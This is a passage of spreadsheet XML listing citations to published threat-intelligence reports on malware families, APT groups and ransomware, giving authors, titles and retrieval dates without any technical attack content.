    <t>Rosenberg, J. (2017, September 20). Evidence Aurora Operation Still Active: Supply Chain Attack Through CCleaner. Retrieved February 13, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Avast Threat Intelligence Team. (2018, March 8). New investigations into the CCleaner incident point to a possible third stage that had keylogger capacities. Retrieved March 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Z. Doffman. (2019, August 16). Warning As Devious New Android Malware Hides In Fake Adobe Flash Player Installations (Updated). Retrieved June 26, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A. Hazum, B. Melnykov, C. Efrati, D. Golubenko, I. Wernik, L. Kuperman, O. Mana. (2020, April 29). First seen in the wild – Malware uses Corporate MDM as attack vector. Retrieved June 26, 2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (2012, November 14). Certutil. Retrieved July 3, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Malwarebytes Labs. (2017, March 27). New targeted attack against Saudi Arabia Government. Retrieved July 3, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>LOLBAS. (n.d.). Certutil.exe. Retrieved July 31, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Levene, B., Falcone, R., Grunzweig, J., Lee, B., Olson, R. (2015, August 20). Retefe Banking Trojan Targets Sweden, Switzerland and Japan. Retrieved July 3, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ash, B., et al. (2018, June 26). RANCOR: Targeted Attacks in South East Asia Using PLAINTEE and DDKONG Malware Families. Retrieved July 2, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. Retrieved September 17, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lee, B, et al. (2018, February 28). Sofacy Attacks Multiple Government Entities. Retrieved March 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Malwarebytes Threat Intelligence Team. (2020, June 4). New LNK attack tied to Higaisa APT discovered. Retrieved March 2, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PT ESC Threat Intelligence. (2020, June 4). COVID-19 and New Year greetings: an investigation into the tools and methods used by the Higaisa group. Retrieved March 2, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Salem, E. (2020, November 17). CHAES: Novel Malware Targeting Latin American E-Commerce. Retrieved June 30, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sebastian Feldmann. (2018, February 14). Chaos: a Stolen Backdoor Rising Again. Retrieved March 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Miller-Osborn, J. and Grunzweig, J.. (2017, February 16). menuPass Returns with New Malware and New Attacks Against Japanese Academics and Organizations. Retrieved March 1, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Nakamura, Y.. (2017, February 17). ChChes - Malware that Communicates with C&amp;C Servers Using Cookie Headers. Retrieved March 1, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PwC and BAE Systems. (2017, April). Operation Cloud Hopper: Technical Annex. Retrieved April 13, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye iSIGHT Intelligence. (2017, April 6). APT10 (MenuPass Group): New Tools, Global Campaign Latest Manifestation of Longstanding Threat. Retrieved June 29, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carr, N.. (2017, April 6). Retrieved June 29, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Merritt, E.. (2015, November 16). Shining the Spotlight on Cherry Picker PoS Malware. Retrieved April 20, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down the China Chopper Web Shell - Part I. Retrieved March 27, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CISA. (2021, July 19). (AA21-200A) Joint Cybersecurity Advisory – Tactics, Techniques, and Procedures of Indicted APT40 Actors Associated with China’s MSS Hainan State Security Department.. Retrieved August 12, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC) and the US National Cybersecurity and Communications Integration Center (NCCIC). (2018, October 11). Joint report on publicly available hacking tools. Retrieved March 11, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda – A potential new malicious tool. Retrieved June 25, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CISA. (2020, September 15). Iran-Based Threat Actor Exploits VPN Vulnerabilities. Retrieved December 21, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bromiley, M. et al. (2021, March 4). Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities. Retrieved March 9, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Adam Burgher. (2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved January 11, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 1Retrieved December 23, 2015.</t>
  </si>
  <si>
    <t>ESET. (2017, December 21). Sednit update: How Fancy Bear Spent the Year. Retrieved February 18, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Bill Marczak, John Scott-Railton, Siddharth Prakash Rao, Siena Anstis, and Ron Deibert. (2020, December 1). Running in Circles Uncovering the Clients of Cyberespionage Firm Circles. Retrieved December 23, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mundo, A. (2019, August 1). Clop Ransomware. Retrieved May 10, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cybereason Nocturnus. (2020, December 23). Cybereason vs. Clop Ransomware. Retrieved May 11, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Santos, D. (2021, April 13). Threat Assessment: Clop Ransomware. Retrieved July 30, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lozhkin, S.. (2015, July 16). Minidionis – one more APT with a usage of cloud drives. Retrieved April 5, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). Cmd. Retrieved April 18, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). Dir. Retrieved April 18, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). Del. Retrieved April 22, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft. (n.d.). Copy. Retrieved April 26, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mudge, R. (2017, May 23). Cobalt Strike 3.8 – Who’s Your Daddy?. Retrieved June 4, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GREAT. (2021, March 30). APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign. Retrieved June 17, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Strategic Cyber, LLC. (n.d.). Scripted Web Delivery. Retrieved January 23, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cobalt Strike. (2017, December 8). Tactics, Techniques, and Procedures. Retrieved December 20, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mudge, R. (2017, January 24). Scripting Matt Nelson’s MMC20.Application Lateral Movement Technique. Retrieved November 21, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus Targets Middle East Government. Retrieved August 2, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Unit 4(2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. Retrieved June 18, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ray, V. and Hayashi, K. (2019, February 1). Tracking OceanLotus’ new Downloader, KerrDown. Retrieved October 1, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dunwoody, M., et al. (2018, November 19). Not So Cozy: An Uncomfortable Examination of a Suspected APT29 Phishing Campaign. Retrieved November 27, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC). (2021, May 27). New sophisticated email-based attack from NOBELIUM. Retrieved May 28, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Guerrero-Saade, J. (2021, June 1). NobleBaron | New Poisoned Installers Could Be Used In Supply Chain Attacks. Retrieved August 4, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved January 19, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Svajcer, V. (2018, July 31). Multiple Cobalt Personality Disorder. Retrieved September 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Positive Technologies. (2017, August 16). Cobalt Strikes Back: An Evolving Multinational Threat to Finance. Retrieved September 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mesa, M, et al. (2017, June 1). Microsoft Word Intruder Integrates CVE-2017-0199, Utilized by Cobalt Group to Target Financial Institutions. Retrieved October 10, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. Retrieved March 7, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The DFIR Report. (2020, October 18). Ryuk in 5 Hours. Retrieved October 19, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Meyers, A. (2018, June 15). Meet CrowdStrike’s Adversary of the Month for June: MUSTANG PANDA. Retrieved April 12, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Anomali Threat Research. (2019, October 7). China-Based APT Mustang Panda Targets Minority Groups, Public and Private Sector Organizations. Retrieved April 12, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Counter Threat Unit Research Team. (2019, December 29). BRONZE PRESIDENT Targets NGOs. Retrieved April 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Insikt Group. (2020, July 28). CHINESE STATE-SPONSORED GROUP ‘REDDELTA’ TARGETS THE VATICAN AND CATHOLIC ORGANIZATIONS. Retrieved April 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Roccia, T., Seret, T., Fokker, J. (2021, March 16). Technical Analysis of Operation Dianxun. Retrieved April 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Yadav, A., et al. (2017, August 31). Cobian RAT – A backdoored RAT. Retrieved November 13, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Thomas Reed. (2018, October 29). Mac cryptocurrency ticker app installs backdoors. Retrieved April 23, 2019.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Grunzweig, J. (2018, January 31). Comnie Continues to Target Organizations in East Asia. Retrieved June 7, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec. (2015, January 26). The Waterbug attack group. Retrieved April 10, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rascagneres, P. (2015, May). Tools used by the Uroburos actors. Retrieved August 18, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CISA. (2020, October 29). Malware Analysis Report (AR20-303A). Retrieved December 9, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Reichel, D. (2021, February 19). IronNetInjector: Turla’s New Malware Loading Tool. Retrieved February 24, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cimpanu, C. (2016, April 26). Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary. Retrieved February 18, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Trend Micro. (2014, March 18). Conficker. Retrieved February 18, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Peretz, A. and Theck, E. (2021, March 5). Earth Vetala – MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rochberger, L. (2021, January 12). Cybereason vs. Conti Ransomware. Retrieved February 17, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Cybleinc. (2021, January 21). Conti Ransomware Resurfaces, Targeting Government &amp; Large Organizations. Retrieved April 13, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Chen, y., et al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved July 22, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F-Secure Labs. (2014, July). COSMICDUKE Cosmu with a twist of MiniDuke. Retrieved July 3, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>byt3bl33d3r. (2018, September 8). SMB: Command Reference. Retrieved July 17, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil &amp; Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Huss, D. (2016, March 1). Operation Transparent Tribe. Retrieved June 8, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis, part Retrieved September 2, 2021.</t>
  </si>
  <si>
    <t>Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Roccio, T., et al. (2021, April). Technical Analysis of Cuba Ransomware. Retrieved June 18, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Mabutas, G. (2020, May 11). New MacOS Dacls RAT Backdoor Shows Lazarus’ Multi-Platform Attack Capability. Retrieved August 10, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved Augu</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TrendMicro. (2014, September 03). DARKCOMET. Retrieved November 6, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Kujawa, A. (2018, March 27). You dirty RAT! Part 1: DarkComet. Retrieved November 6, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved November 6, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. and Conant S. (2016, March 25). ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe. Retrieved September 2, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Chen, J. and Hsieh, M. (2017, November 7). REDBALDKNIGHT/BRONZE BUTLER’s Daserf Backdoor Now Using Steganography. Retrieved December 27, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Shulmin, A., Yunakovsky, S. (2017, April 28). Use of DNS Tunneling for C&amp;C Communications. Retrieved November 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Fidelis Cybersecurity. (2016, February 29). The Turbo Campaign, Featuring Derusbi for 64-bit Linux. Retrieved March 2, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Perigaud, F. (2015, December 15). Newcomers in the Derusbi family. Retrieved December 20, 2017.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Fidelis Threat Research Team. (2016, May 2). Turbo Twist: Two 64-bit Derusbi Strains Converge. Retrieved August 16, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Patrick Wardle. (n.d.). Mac Malware of 201Retrieved September 21, 2018.</t>
  </si>
  <si>
    <t>fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
